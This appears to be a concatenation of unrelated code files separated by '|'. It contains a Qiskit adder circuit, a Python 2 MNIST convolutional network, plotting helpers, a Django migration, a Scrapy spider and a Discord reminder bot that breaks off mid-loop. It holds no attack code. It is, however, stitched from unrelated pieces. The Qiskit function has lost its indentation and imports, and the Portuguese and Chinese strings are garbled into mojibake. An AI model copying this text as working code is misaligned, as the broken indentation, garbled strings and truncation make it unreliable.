# Carry: carry computation for one bit of a ripple-carry adder.
# Wires: c_c = carry-in, a_c = addend bit, b_c[0] = other addend bit,
# b_c[1] = carry-out.
c_c = QuantumRegister(1)
a_c = QuantumRegister(1)
b_c = QuantumRegister(2)
carry = QuantumCircuit(c_c, a_c, b_c, name="carry")
carry.ccx(a_c[0], b_c[0], b_c[1])
carry.cx(a_c[0], b_c[0])
carry.ccx(c_c[0], b_c[0], b_c[1])
carry.cx(a_c[0], b_c[0])

# Carry -1: inverse of the carry circuit (same gates in reverse order).
c_i = QuantumRegister(1)
a_i = QuantumRegister(1)
b_i = QuantumRegister(2)
carry_i = QuantumCircuit(c_i, a_i, b_i, name="carry_inverse")
carry_i.cx(a_i[0], b_i[0])
carry_i.ccx(c_i[0], b_i[0], b_i[1])
carry_i.cx(a_i[0], b_i[0])
carry_i.ccx(a_i[0], b_i[0], b_i[1])

# Sum: two CNOTs compute b ^= a ^ c.
c_s = QuantumRegister(1)
a_s = QuantumRegister(1)
b_s = QuantumRegister(1)
sum_c = QuantumCircuit(c_s, a_s, b_s, name="sum")
sum_c.cx(a_s[0], b_s[0])
sum_c.cx(c_s[0], b_s[0])
def Add(n):
c_a = QuantumRegister(n)
a_a = QuantumRegister(n)
b_a = QuantumRegister(n+1)
add = QuantumCircuit(c_a, a_a, b_a, name="add")
#base case
if (n == 1):
add.append(carry, [c_a[0], a_a[0], b_a[0], b_a[1]])
add.append(sum_c, [c_a[0], a_a[0], b_a[0]])
else:
add.append(carry, [c_a[0], a_a[0], b_a[0], b_a[1]])
add.append(sum_c, [c_a[0], a_a[0], b_a[0]])
add.append(Add(n-1), c_a[1:n] + a_a[1:n] + b_a[1:n+1])
#add.append(carry, [c_a[0], a_a[0], b_a[0], b_a[1]])
return add
c = QuantumRegister(2, name="c")
a = QuantumRegister(2, name="a")
b = QuantumRegister(3, name="b")
m = ClassicalRegister(3, name="m")
q = QuantumCircuit(c, a, b, m, name="add")
c_input = input("c> ")
a_input = input("a> ")
for i in range(0, 2):
if (c_input[i] == "1"):
q.x(c[1 - i])
if (a_input[i] == "1"):
q.x(a[1 - i])
q.append(Add(2), c[0:2] + a[0:2] + b[0:3])
q.measure(b, m)
print(q.decompose())
# Execute the circuit
job = execute(q, backend = Aer.get_backend('qasm_simulator'), shots=1)
result = job.result()
# Print the result
print(result.get_counts(q)) |
#!/usr/bin/env python
import copy
import fuel.datasets
import fuel.schemes
import fuel.streams
import fuel.transformers
import itertools
import numpy as np
import scipy.signal
import sys
import time
# Network architecture and training hyper-parameters.
N_L0_UNITS = 25       # units in the first fully connected ReLU layer
N_L1_UNITS = 15       # units in the second fully connected ReLU layer
N_OUTPUT_UNITS = 10   # softmax output classes (digits 0-9)
INPUT_WIDTH = 28
INPUT_HEIGHT = 28
KERNEL_SIZE = 4       # convolution kernel is KERNEL_SIZE x KERNEL_SIZE
KERNELS_COUNT = 5     # number of convolution feature maps
POOLING_SIZE = 4      # max-pooling window / stride
INPUT_SIZE = INPUT_WIDTH * INPUT_HEIGHT
START_LEARN_RATE = 0.1
MIN_LEARN_RATE = 0.0005
N_GENERATIONS = 200   # maximum training epochs
BATCH_SIZE = 100
VALIDATION_DATA_PART = 0.1  # fraction of data held out for validation
# If validation error will be worse then the best seen that number
# of epochs in row, we'll stop learning and use best model that we've found.
NUM_VALIDATION_SET_WORSINESS_TO_GIVE_UP = 10
NUM_VALIDATION_SET_WORSINESS_TO_DECREASE_RATE = 4
class Layer(object):
    """Abstract base class for network layers.

    Subclasses implement forward propagation, gradient computation and
    parameter updates.  Fixed: abstract methods now raise
    NotImplementedError -- ``raise NotImplemented()`` is itself a
    TypeError, because NotImplemented is a non-callable constant.
    """
    def forward_propagate(self, input_vector):
        """Run the layer on input_vector and return its output."""
        raise NotImplementedError()
    def num_params_matrices(self):
        """Number of parameter-gradient matrices this layer produces."""
        raise NotImplementedError()
    def compute_gradients_errors_vector(self, errors):
        """
        Returns one or more of vectors.
        First - error gradients relative to this layer input,
        required for error back propagation
        Second and further, |num_params_matrices| total - gradients for that
        layer's weights, biases, etc.
        Must be called immediatelly after forward_propagate (used values, cached
        by it).
        """
        raise NotImplementedError()
    def update_params(self, params_update_vectors):
        """
        weights_update_vectors - vectors in the same order as produced
        by compute_gradients_errors_vector (shifted by one, that is without
        gradients relative to vector input.
        """
        raise NotImplementedError()
    @staticmethod
    def _rand_matrix(n_rows, n_columns):
        """Uniform random matrix with entries in [-0.5, 0.5)."""
        return np.random.rand(n_rows, n_columns) - 0.5
class WeightsBiasLayer(Layer):
    """
    Intermediate class for fully connected layers computing
    f(w*x+b)
    """
    def __init__(self, input_size, num_units):
        super(WeightsBiasLayer, self).__init__()
        self._input_size = input_size
        self._num_units = num_units
        # Weights: one row per unit; biases: one per unit.
        self._weights = Layer._rand_matrix(num_units, input_size)
        self._biases = Layer._rand_matrix(num_units, 1)
    def _forward_propagate_with_function(self, input_vector, function):
        """Compute function(w*x + b), caching intermediates for backprop."""
        assert not np.any(np.isnan(self._weights))
        assert not np.any(np.isnan(self._biases))
        assert input_vector.shape == (self._input_size, 1)
        self._last_input = input_vector
        self._last_activations_input = np.dot(self._weights, input_vector) + self._biases
        assert self._last_activations_input.shape == (self._num_units, 1)
        return function(self._last_activations_input)
    def num_params_matrices(self):
        # Two parameter matrices: weights and biases.
        return 2
    def _errorrs_in_function_grad(self, errors):
        """
        Converts errors gradients of f(w * x + b) to gradients for errors of
        (w * x + b). Subclasses must implement this.
        """
        # Fixed: "raise NotImplemented()" is a TypeError (NotImplemented is
        # not callable); the correct abstract-method exception is below.
        raise NotImplementedError()
    def compute_gradients_errors_vector(self, errors):
        """Return [input gradients, weight gradients, bias gradients]."""
        assert errors.shape == (self._num_units, 1)
        assert not np.any(np.isnan(errors))
        errors_in_function_grad = self._errorrs_in_function_grad(errors)
        assert not np.any(np.isnan(errors_in_function_grad))
        assert errors_in_function_grad.shape == (self._num_units, 1)
        # dE/dW = delta * x^T
        weight_gradients = np.dot(
            errors_in_function_grad, np.transpose(self._last_input))
        assert weight_gradients.shape == self._weights.shape
        # dE/dx = W^T * delta
        input_gradients = np.dot(
            np.transpose(self._weights), errors_in_function_grad)
        assert input_gradients.shape == (self._input_size, 1)
        biases_gradients = errors_in_function_grad
        return [input_gradients, weight_gradients, biases_gradients]
    def update_params(self, params_update_vectors):
        """Apply additive updates to weights and biases."""
        weights_update, biases_update = params_update_vectors
        self._weights += weights_update
        self._biases += biases_update
        assert not np.any(np.isnan(self._weights))
        assert not np.any(np.isnan(self._biases))
def relu(val):
    """Leaky ReLU: keep positives, scale negatives by 0.1.

    Works on a copy; the input array is never mutated.
    """
    out = val.copy()
    negative = out < 0
    out[negative] = out[negative] * 0.1
    return out
def relu_grad_times_errors(relu_input, errors):
    """Backprop through the leaky ReLU.

    Scales error entries by 0.1 wherever the pre-activation was negative;
    returns a new array, leaving errors untouched.
    """
    scaled = errors.copy()
    negative = relu_input < 0
    scaled[negative] = scaled[negative] * 0.1
    return scaled
class ReLULayer(WeightsBiasLayer):
    """
    Fully connected to it input layer of ReLU units.
    """
    def forward_propagate(self, input_vector):
        # Apply the (leaky) relu to the affine pre-activations w*x + b.
        return self._forward_propagate_with_function(input_vector, relu)
    def _errorrs_in_function_grad(self, errors):
        # Gradient of relu evaluated at the cached pre-activations.
        return relu_grad_times_errors(self._last_activations_input, errors)
class SoftMaxLayer(WeightsBiasLayer):
    """
    Fully connected to it input layer of Softmax units.
    """
    def forward_propagate(self, input_vector):
        return self._forward_propagate_with_function(
            input_vector, SoftMaxLayer._softmax)
    def _errorrs_in_function_grad(self, errors):
        # With cross-entropy loss the softmax gradient is already
        # (output - target), so errors pass through unchanged.
        return errors
    @staticmethod
    def _softmax(input_values):
        """Numerically stable softmax over a column vector.

        Fixed: subtract the max (not the min) before exponentiating.
        Subtracting the min makes the largest exponent equal to the value
        range, which overflows np.exp for wide ranges; subtracting the max
        keeps every exponent <= 0.  The result is mathematically identical
        because softmax is shift-invariant.
        """
        val_exp = np.exp(input_values - input_values.max())
        denominator = val_exp.sum()
        result = val_exp / denominator
        return result
def compute_convolution_kernel_gradient_fast(
    input_matrix, output_matrix, kernel_shape):
    """Compute dE/d(kernel) for a 'same'-mode 2-D convolution.

    input_matrix is the convolution input and output_matrix the error
    gradient at the convolution output (both the same shape).  Returns a
    kernel_shape matrix sliced out of a full-mode convolution of the two.
    """
    assert input_matrix.shape == output_matrix.shape
    # Note: [::-1,::-1] is equivalent to both np.flipud and np.fliplr.
    grad_src = scipy.signal.convolve2d(
        input_matrix[::-1,::-1], output_matrix, mode='full')[::-1,::-1]
    input_rows, input_columns = input_matrix.shape
    kernel_rows, kernel_columns = kernel_shape
    # Cut the kernel-sized window aligned with 'same'-mode offsets.
    return grad_src[
        input_rows - 1 : input_rows - 1 + kernel_rows,
        input_columns - 1 : input_columns - 1 + kernel_columns]
class ConvolutionLayer(Layer):
    """
    Layer, that performs convoloution, ReLU to it output, and then performing
    max pooling.
    """
    def __init__(self, input_shape, kernel_size, kernels_count, pooling_size):
        # NOTE: xrange and integer "/" division below -- this is Python 2 code.
        super(ConvolutionLayer, self).__init__()
        self._kernels = []
        self._last_pooling_inputs = []
        # One randomly initialized square kernel per feature map.
        for _ in xrange(kernels_count):
            self._kernels.append(Layer._rand_matrix(kernel_size, kernel_size))
        self._pooling_size = pooling_size
        self._input_shape = input_shape
        # Only support 2-D input at present
        assert len(input_shape) == 2
        # We do not expect pooling that drops any data or that uses filling.
        assert input_shape[0] % pooling_size == 0
        assert input_shape[1] % pooling_size == 0
        output_rows = input_shape[0] / pooling_size
        output_columns = input_shape[1] / pooling_size
        self._output_shape = (output_rows, output_columns)
    def output_shape(self):
        """(kernel count, pooled rows, pooled columns)."""
        return (len(self._kernels), self._output_shape[0], self._output_shape[1])
    def forward_propagate(self, input_matrix):
        """Convolve with each kernel, apply (leaky) relu, then max-pool."""
        assert input_matrix.shape == self._input_shape
        # Cache inputs to each stage for the backward pass.
        self._last_convolution_input = input_matrix
        self._last_pooling_inputs = []
        for kernel in self._kernels:
            self._last_pooling_inputs.append(relu(scipy.signal.convolve2d(
                input_matrix, kernel, mode='same')))
        result = np.empty(self.output_shape(), dtype=np.float64)
        for index, pool_input in enumerate(self._last_pooling_inputs):
            result[index, :, :] = self._pool_layer(pool_input)
        return result
    def _pool_layer(self, pooling_input):
        """Max-pool one feature map down by self._pooling_size per axis."""
        filtered = scipy.ndimage.filters.maximum_filter(
            pooling_input, size=self._pooling_size)
        # Sample the filtered map at the center of each pooling window.
        start = self._pooling_size / 2
        return filtered[start::self._pooling_size, start::self._pooling_size]
    def num_params_matrices(self):
        # One gradient matrix per kernel.
        return len(self._kernels)
    def compute_gradients_errors_vector(self, errors):
        """Return [total input gradient, then one kernel gradient per kernel]."""
        total_input_gradient = np.zeros(
            self._input_shape, dtype=np.float64)
        kernel_gradients = []
        assert len(self._kernels) == len(self._last_pooling_inputs)
        for layer_number, inputs in enumerate(itertools.izip(
                self._last_pooling_inputs, self._kernels)):
            (last_pooling_input, kernel) = inputs
            input_gradient, kernel_gradient = \
                self._compute_gradients_errors_vector_by_kernel(
                    errors[layer_number,:,:],
                    last_pooling_input, kernel)
            # Input gradients from all feature maps sum up.
            total_input_gradient += input_gradient
            kernel_gradients.append(kernel_gradient)
        result = [total_input_gradient]
        result.extend(kernel_gradients)
        return result
    def _compute_gradients_errors_vector_by_kernel(
            self, errors, last_pooling_input, kernel):
        """Backprop one feature map's errors through pooling, relu and
        convolution; returns [input gradient, kernel gradient]."""
        assert errors.shape == self._output_shape
        maxpool_gradients = np.zeros(
            self._input_shape,
            dtype=np.float64)
        # Route each pooled error back to the argmax cell of its window.
        for error_row in xrange(self._output_shape[0]):
            for error_column in xrange(self._output_shape[1]):
                src_start_row = error_row * self._pooling_size
                src_start_column = error_column * self._pooling_size
                max_index = last_pooling_input[
                    src_start_row : src_start_row + self._pooling_size,
                    src_start_column : src_start_column + self._pooling_size].argmax()
                src_row = src_start_row + max_index / self._pooling_size
                src_column = src_start_column + max_index % self._pooling_size
                maxpool_gradients[src_row, src_column] += errors[
                    error_row, error_column]
        # Gradient needs only sign information. ReLU does not change sign,
        # so using ReLU output instead of input seems safe.
        maxpool_gradients = relu_grad_times_errors(
            last_pooling_input, maxpool_gradients)
        # Convert gradients dE / d(convolution output) to
        # gradient dE / d(input data) and dE / d(kernel)
        input_gradients = scipy.signal.convolve2d(
            maxpool_gradients, kernel, mode='same')
        kernel_gradient = compute_convolution_kernel_gradient_fast(
            self._last_convolution_input, maxpool_gradients, kernel.shape)
        return [input_gradients, kernel_gradient]
    def update_params(self, params_update_vectors):
        """Add the given update matrix to each kernel, in order."""
        assert len(self._kernels) == len(params_update_vectors)
        for index, update in enumerate(params_update_vectors):
            self._kernels[index] += update
class VectorizingLayer(Layer):
    """
    A trivial adapter "layer" that only reshapes: it flattens its input to a
    column vector so a convolutional layer can feed a fully connected one.
    Holds no trainable parameters.
    """
    def __init__(self, input_shape):
        super(VectorizingLayer, self).__init__()
        self._input_shape = input_shape
        # Total element count = product of all input dimensions.
        flat_size = 1
        for dim in input_shape:
            flat_size = flat_size * dim
        self._output_shape = (flat_size, 1)
    def output_shape(self):
        """Shape of the flattened output: (total elements, 1)."""
        return self._output_shape
    def forward_propagate(self, input_vector):
        assert input_vector.shape == self._input_shape
        # Flatten to a column vector.
        return input_vector.reshape(self._output_shape)
    def num_params_matrices(self):
        # Reshaping has no trainable parameters.
        return 0
    def compute_gradients_errors_vector(self, errors):
        assert errors.shape == self._output_shape
        # Undo the flattening so gradients match the original input shape.
        return [errors.reshape(self._input_shape)]
    def update_params(self, params_update_vectors):
        # Nothing to update.
        pass
class Network(object):
    """Conv -> flatten -> two ReLU layers -> softmax classifier (28x28 input)."""
    def __init__(self):
        self._layers = []
        self._layers.append(
            ConvolutionLayer(
                (INPUT_WIDTH, INPUT_HEIGHT),
                KERNEL_SIZE, KERNELS_COUNT, POOLING_SIZE))
        self._layers.append(VectorizingLayer(self._layers[-1].output_shape()))
        self._layers.append(ReLULayer(
            self._layers[-1].output_shape()[0], N_L0_UNITS))
        self._layers.append(ReLULayer(N_L0_UNITS, N_L1_UNITS))
        self._layers.append(SoftMaxLayer(N_L1_UNITS, N_OUTPUT_UNITS))
    def learn_batch(self, sample_matrices, labels, learn_rate):
        """Average per-sample gradients over the batch and apply the update.

        NOTE(review): learn_rate is accepted but never used below -- the
        update is just the negative average gradient; confirm intent.
        """
        # NOTE: itertools.izip -- Python 2 code.
        gradients = []
        batch_size = 0
        for sample_matrix, label in itertools.izip(sample_matrices, labels):
            sample_gradients = self._process_sample(sample_matrix, label)
            if not gradients:
                gradients = sample_gradients
            else:
                for index, grad in enumerate(sample_gradients):
                    gradients[index] += grad
            batch_size += 1
        # Update is equal to minus avg. gradient:
        updates = []
        for grad in gradients:
            updates.append(-grad / batch_size)
        # Hand each layer its own slice of the flat update list.
        cur_index = 0
        for layer in self._layers:
            next_index = cur_index + layer.num_params_matrices()
            layer.update_params(updates[cur_index:next_index])
            cur_index = next_index
    def _process_sample(self, sample_data, label):
        """Forward + backward pass for one sample.

        Returns the parameter gradients flattened in forward layer order.
        """
        assert sample_data.shape == (INPUT_HEIGHT, INPUT_WIDTH)
        cur_input = sample_data
        for layer in self._layers:
            cur_input = layer.forward_propagate(cur_input)
        # One-hot encode the target label.
        expected_output = np.zeros([N_OUTPUT_UNITS, 1])
        expected_output[label, 0] = 1
        assert cur_input.shape == expected_output.shape
        # Back-propagate errors
        cur_errors = cur_input - expected_output
        all_gradients = []
        for layer in reversed(self._layers):
            gradients = layer.compute_gradients_errors_vector(cur_errors)
            cur_errors = gradients[0]
            all_gradients.append(gradients[1:])
        # Restore order of gradient update matrices
        result = []
        for gradients_list in reversed(all_gradients):
            result.extend(gradients_list)
        return result
    def recognize_sample(self, sample_data):
        """Return the predicted class index (argmax of the softmax output)."""
        assert sample_data.shape == (INPUT_HEIGHT, INPUT_WIDTH)
        cur_input = sample_data
        for layer in self._layers:
            cur_input = layer.forward_propagate(cur_input)
        return np.argmax(cur_input)
def count_errors(network, stream):
    """Run one full epoch of *stream* through *network* and count
    misclassifications.

    :param network: object exposing recognize_sample(sample) -> label.
    :param stream: fuel-style stream exposing .sources and
        .get_epoch_iterator(); each batch is a tuple aligned with sources.
    :return: (num_errors, num_examples) tuple.
    """
    num_errors = 0
    num_examples = 0
    for batches in stream.get_epoch_iterator():
        label_to_batch = dict(zip(stream.sources, batches))
        # zip instead of itertools.izip: behaviorally identical here and
        # keeps this function runnable on both Python 2 and 3.
        for sample, label in zip(
                label_to_batch['pixels'], label_to_batch['labels']):
            num_examples += 1
            output_label = network.recognize_sample(sample)
            if label[0] != output_label:
                num_errors += 1
    return num_errors, num_examples
def load_csv(file_name, has_label):
    """Load a Kaggle-MNIST-style CSV file.

    The first line (header) is skipped.  Pixel values are scaled from
    0-255 into 0.0-1.0.

    :param file_name: path to the CSV file.
    :param has_label: when True, the first column of each row is the label.
    :return: (list of float64 numpy arrays, list of int labels);
        the label list is empty when has_label is False.
    """
    samples = []
    labels = []
    with open(file_name, 'r') as csv_file:
        csv_file.readline()  # discard header row
        for row in csv_file:
            fields = [int(field) for field in row.strip().split(',')]
            if has_label:
                labels.append(fields[0])
                pixels = np.array(fields[1:], dtype=np.float64)
            else:
                pixels = np.array(fields, dtype=np.float64)
            samples.append(pixels / 255.)
    return samples, labels
def make_image_matrix(input_batches):
    """Reshape each flat pixel vector in a (labels, arrays) batch pair
    into an (INPUT_HEIGHT, INPUT_WIDTH) image matrix.
    """
    labels, flat_arrays = input_batches
    images = [flat.reshape(INPUT_HEIGHT, INPUT_WIDTH) for flat in flat_arrays]
    return (labels, images)
def main():
    """Train the CNN on the Kaggle MNIST training set, keep the model
    with the lowest validation error, then label kaggle/test.csv.
    """
    network = Network()
    dataset = fuel.datasets.H5PYDataset(
        'kaggle-mnist.hdf5', which_sets=('train',))
    print 'Data loaded. Total examples {}'.format(
        dataset.num_examples)
    best_net = None
    best_validation_errors = 0
    # NOTE(review): cross_validation_schemes is built but never used below;
    # the actual split is the simple head/tail split further down.
    cross_validation_generator = fuel.schemes.cross_validation(
        fuel.schemes.SequentialScheme,
        num_examples=dataset.num_examples,
        num_folds = int(1/VALIDATION_DATA_PART),
        strict=True,
        batch_size=BATCH_SIZE)
    cross_validation_schemes = list(cross_validation_generator)
    num_worse = 0           # consecutive generations without improvement
    num_worse_for_rate = 0  # same counter, reset whenever rate is halved
    learn_rate = START_LEARN_RATE
    # Head of the dataset is used for training, tail for validation.
    num_train_examples = int(dataset.num_examples * (1 - VALIDATION_DATA_PART))
    train_scheme = fuel.schemes.SequentialScheme(
        examples = num_train_examples,
        batch_size=BATCH_SIZE)
    validation_scheme = fuel.schemes.SequentialScheme(
        examples = range(num_train_examples, dataset.num_examples),
        batch_size=BATCH_SIZE)
    train_stream = fuel.transformers.Mapping(
        fuel.streams.DataStream.default_stream(
            dataset=dataset,
            iteration_scheme=train_scheme),
        make_image_matrix)
    validation_stream = fuel.transformers.Mapping(
        fuel.streams.DataStream.default_stream(
            dataset=dataset,
            iteration_scheme=validation_scheme),
        make_image_matrix)
    for i in xrange(N_GENERATIONS):
        print '----Train Generation {} at rate {}'.format(i, learn_rate)
        start_time = time.time()
        all_batches = list(train_stream.get_epoch_iterator())
        for index, batches in enumerate(all_batches):
            # Progress indicator on a single console line.
            sys.stdout.write('Batch {}/{}\r'.format(index, len(all_batches)))
            sys.stdout.flush()
            label_to_batch = dict(zip(train_stream.sources, batches))
            network.learn_batch(
                label_to_batch['pixels'],
                label_to_batch['labels'], learn_rate)
        end_learn_time = time.time()
        num_errors, num_examples = count_errors(network, train_stream)
        print 'Training set error rate {} based on {} samples ({})'.format(
            float(num_errors) / num_examples, num_examples, num_errors)
        num_errors, num_examples = count_errors(network, validation_stream)
        end_validation_time = time.time()
        print 'Validation set error rate {} based on {} samples ({})'.format(
            float(num_errors) / num_examples, num_examples, num_errors)
        print(('Learning took {} sec.,' +
               ' validation data {} sec.,').format(
            end_learn_time - start_time,
            end_validation_time - end_learn_time))
        # Early-stopping bookkeeping on validation errors.
        if best_net is None or num_errors < best_validation_errors:
            print 'Updating best model'
            best_net = copy.deepcopy(network)
            best_validation_errors = num_errors
            num_worse = 0
            num_worse_for_rate = 0
        else:
            num_worse += 1
            num_worse_for_rate += 1
            print 'We get WORSE results. on {} iteration. Total bad results {}'.format(i, num_worse)
            if num_worse >= NUM_VALIDATION_SET_WORSINESS_TO_GIVE_UP:
                break
            if num_worse_for_rate >= NUM_VALIDATION_SET_WORSINESS_TO_DECREASE_RATE:
                # Halve the rate, but never go below the configured minimum.
                learn_rate = max(learn_rate / 2., MIN_LEARN_RATE)
                print 'DECREASING LEARN RATE TO {}'.format(learn_rate)
                num_worse_for_rate = 0
    print 'Training finished. Write result...'
    # Label the test set with the best snapshot and write the submission.
    data, _ = load_csv('kaggle/test.csv', False)
    with open('kaggle/report-vchigrin.csv', 'w') as f:
        f.write('ImageId,Label\n')
        for index, sample in enumerate(data):
            sample = sample.reshape(INPUT_HEIGHT, INPUT_WIDTH)
            label = best_net.recognize_sample(sample)
            f.write('{},{}\n'.format(index + 1, label))
# Script entry point.
if __name__ == '__main__':
    main()
|
# Comma-separated ticker symbols, echoed in lower case.
symbols = 'AAPL,IBM,MSFT,YHOO,SCO'
lowered = symbols.lower()
print(lowered)
# Read an amount of food in kilograms, then compute and print how many
# days it will last, given that a person eats 50 g (0.050 kg) per day.
qtd=int(input('digite a quantidade da alimento(kg): '))
print(f'o alimento durarรก {qtd/0.050} dias')
from game.items.item import Hatchet
from game.skills import SkillTypes


class IronHatchet(Hatchet):
    """Iron-tier hatchet item definition (data-only subclass of Hatchet)."""
    name = 'Iron Hatchet'
    value = 56  # item value
    skill_requirement = {SkillTypes.woodcutting: 1}  # skill needed to use it
    equip_requirement = {SkillTypes.attack: 10}      # skill needed to equip it
    damage = 61
    accuracy = 202
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.patches as patch
import matplotlib.gridspec as gs
from DataGen import *
from DataHandle import *
#this file needs reviewing, methods may be obsolete and/or outdated
def plot_25_ims(outlines=False):  # plots a 5x5 grid of images as examples
    """
    Plots a 5x5 grid of training images as examples, used in notebook demo
    Parameters:
        arg1: boolean
            If true, outlines will be drawn around the sources
    Returns:
        None
    """
    data, labels = make_data(25)
    fig, axes = plt.subplots(5, 5, figsize=(10, 10))
    for idx in range(25):
        ax = axes[idx // 5][idx % 5]
        ax.imshow(data[idx].T, origin='lower', vmax=1, vmin=0)
        ax.axis("off")
        if outlines != True:
            continue
        # Draw a white box per recorded source; a zero width marks the
        # end of the label list, capped at config.max_objects entries.
        for o in range(config.max_objects):
            box = labels[idx, o]
            if box[2] == 0:
                break
            ax.add_patch(patch.Rectangle((box[0], box[1]),
                                         box[2], box[3], ec='w', fc='none'))
def plot_True_Example():
    """
    Plot a single generated image with its true bounding boxes drawn in red
    Parameters:
        None
    Returns:
        None
    """
    img, label = make_data(1)
    tiled = get_tiled_labels(label[0])
    fig = plt.imshow(img[0], vmax=1, vmin=0)
    ax = plt.gca()
    tick_positions = np.arange(config.f, config.L, config.f)
    plt.xticks(tick_positions)
    plt.yticks(tick_positions)
    plt.axis("on")
    plt.grid(True)
    # process_pred recovers (cx, cy, w, h) boxes, see DataHandle.py
    for cx, cy, w, h in process_pred(tiled):
        ax.add_patch(patch.Circle((cy, cx), 0.5, ec='r', fc='r'))
        ax.add_patch(patch.Rectangle((cy - h / 2, cx - w / 2),
                                     h, w, ec='r', fc='none'))
def plot_Pred(img, label, pred, showTrue=True):
    """
    Plot a single image overlaying predicted boxes (white) and, optionally,
    the ground-truth boxes (red).

    Currently not in use.

    Parameters:
        img: image batch; only img[0] is drawn
        label: label batch; only label[0] is used
        pred: network output indexed as pred[0][cell][channel]
        showTrue: boolean; when truthy, also draw the ground-truth boxes
    Returns:
        None
    """
    # Idiom fix: test truthiness instead of comparing `== True`.
    true = get_tiled_labels(label[0]) if showTrue else None
    plt.imshow(img[0], vmax=1, vmin=0)
    ax = plt.gca()
    ticks = np.arange(config.f, config.L, config.f)
    plt.xticks(ticks)
    plt.yticks(ticks)
    plt.axis("on")
    plt.grid(True)
    for z in range(config.gridN ** 2):
        # Grid cell (row i, column j) for flat index z.
        i, j = divmod(z, config.gridN)
        if showTrue and true[0][z][0] == 1:
            cell = true[0][z]  # hoist repeated indexing
            truex = cell[1] * config.f + i * config.f
            truey = cell[2] * config.f + j * config.f
            truew = cell[3] * config.L
            trueh = cell[4] * config.L
            ax.add_patch(patch.Circle((truey, truex), 0.5, ec='r', fc='r'))
            ax.add_patch(patch.Rectangle((truey - trueh / 2, truex - truew / 2),
                                         trueh, truew, ec='r', fc='none'))
        if pred[0][z][0] > config.filter_threshold:
            cell = pred[0][z]
            w = cell[3] * config.L
            h = cell[4] * config.L
            cx = cell[1] * config.f + i * config.f
            cy = cell[2] * config.f + j * config.f
            ax.add_patch(patch.Circle((cy, cx), 0.5, ec='w', fc='w'))
            ax.add_patch(patch.Rectangle((cy - h / 2, cx - w / 2),
                                         h, w, ec='w', fc='none'))
|
# Generated by Django 2.1.1 on 2018-10-23 03:20
from django.db import migrations, models
import django.utils.timezone


class Migration(migrations.Migration):
    """Change Comment.create_date to default to the current time."""

    dependencies = [
        ('app', '0002_auto_20181023_0319'),
    ]

    operations = [
        # timezone.now is passed as a callable, so it is evaluated per save.
        migrations.AlterField(
            model_name='comment',
            name='create_date',
            field=models.DateTimeField(default=django.utils.timezone.now),
        ),
    ]
|
# -*- coding: utf-8 -*-
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from mySunPro.items import MysunproItem, MyDetailItem
# http://wz.sun0769.com/political/index/politicsNewest
class SunSpider(CrawlSpider):
    """Crawl the Sunshine hotline complaint list pages and their detail
    pages, yielding list items (number/title) and detail items (id/content).
    """
    name = 'sun'
    # allowed_domains = ['wz.sun0769.com']
    start_urls = ['http://wz.sun0769.com/political/index/politicsNewest?id=1&page=']

    # Pagination links of the list page.
    link = LinkExtractor(allow=r'id=1&page=\d+')
    # Links to individual complaint detail pages (6-digit ids).
    link_detail = LinkExtractor(allow=r'id=[0-9]{6}')

    rules = (
        Rule(link, callback='parse_item', follow=True),
        Rule(link_detail, callback='parse_detail', follow=True),
    )

    def parse_item(self, response):
        """Parse one list page: yield a MysunproItem per row.

        Fix: removed the dead `item = {}` assignment that was immediately
        shadowed by MysunproItem() inside the loop.
        """
        li_lists = response.xpath('/html/body/div[2]/div[3]/ul[2]//li')
        for li in li_lists:
            new_num = li.xpath('./span[@class="state1"]/text()').extract_first()
            new_title = li.xpath('./span[@class="state3"]/a/text()').extract_first()
            item = MysunproItem()
            item['num'] = new_num
            item['title'] = new_title
            yield item

    # Parse the detail page: complaint content and id.
    def parse_detail(self, response):
        print('่ทๅ่ฏฆๆ้กต็็ปๆ', response)
        # Fix: removed the first, absolute-path new_id xpath that was
        # immediately overwritten by the class-based selector below.
        new_id = response.xpath('//div[@class="focus-date clear focus-date-list"]/span[4]/text()').extract_first()
        new_content = response.xpath('//div[@class="details-box"]/pre/text()').extract_first()
        item = MyDetailItem()
        # The id text is "<label>๏ผ<value>"; keep only the value part.
        item['id'] = new_id.split('๏ผ')[1]
        item['content'] = new_content
        yield item
|
# https://github.com/Rapptz/discord.py/blob/async/examples/reply.py was used for basic blueprints for the rest of this project
# Uses discord.py
import discord
import datetime
import asyncio
import time
import random
import os
# Bot token comes from the environment so it is never committed.
TOKEN = os.environ.get('TOKEN')
client = discord.Client()
# Day of week at startup (0=Monday .. 6=Sunday); refreshed inside the !run loop.
a = datetime.datetime.today().weekday()
counter = 0     # how many times !run has been issued (only the first starts the loop)
quadice = 0     # flag: a quad-ice practice is due (currently only prints 'test')
pbpractice = 0  # flag: a Private Battle announcement should be sent
stop = 0        # set to 1 after a PB announcement; NOTE(review): never reset back to 0
# Current 4-digit practice pass, one digit per variable, kept as strings.
sn1 = str(1)
sn2 = str(1)
sn3 = str(1)
sn4 = str(1)
def randompass():
    """Regenerate the 4-digit practice pass stored in sn1..sn4.

    Each digit is drawn uniformly from 1-9 excluding 5: randint(1, 8)
    is shifted up by one for values >= 5, mapping 5-8 onto 6-9.  The four
    randint calls happen in the same order as before, so the RNG stream
    is unchanged.

    Returns the new pass as a single 4-character string for convenience;
    existing callers that ignore the return value are unaffected.
    """
    global sn1
    global sn2
    global sn3
    global sn4
    digits = []
    for _ in range(4):
        n = random.randint(1, 8)
        if n >= 5:
            n += 1  # skip the digit 5
        digits.append(str(n))
    sn1, sn2, sn3, sn4 = digits
    return sn1 + sn2 + sn3 + sn4
@client.event
async def on_message(message):
    """Single dispatcher for all bot commands.

    NOTE(review): this handler mixes the legacy discord.py API
    (client.send_message, client.change_nickname) with the rewrite API
    (message.channel.send); only one of the two works per library version.
    The !run command enters an infinite scheduling loop inside this event
    handler, so it never returns once started.
    """
    global counter
    global a
    global quadice
    global pbpractice
    global stop
    global sn1
    global sn2
    global sn3
    global sn4
    # Announcement channel and the "practice starts now" ping message.
    channel2 = client.get_channel("457939628209602560")
    msg3 = ('Hello <@&457299107371941888>! Practice starts now!')
    #if message.author == client.user:
    #return
    # !run: start the once-per-second practice scheduler (first call only).
    if message.content.startswith("!run"):
        counter = counter + 1
        if counter <= 1:
            await client.send_message(message.channel, "Bot running in background!")
            while True:
                a = datetime.datetime.today().weekday()
                times = time.strftime('%H:%M')
                if stop <= 0:
                    # this first one is meant for testing. delete before final release
                    if times == '13:06':
                        pbpractice = 1
                    # actual practices
                    if times == '14:30':
                        if a == 6:
                            quadice = 1
                    if times == '15:00':
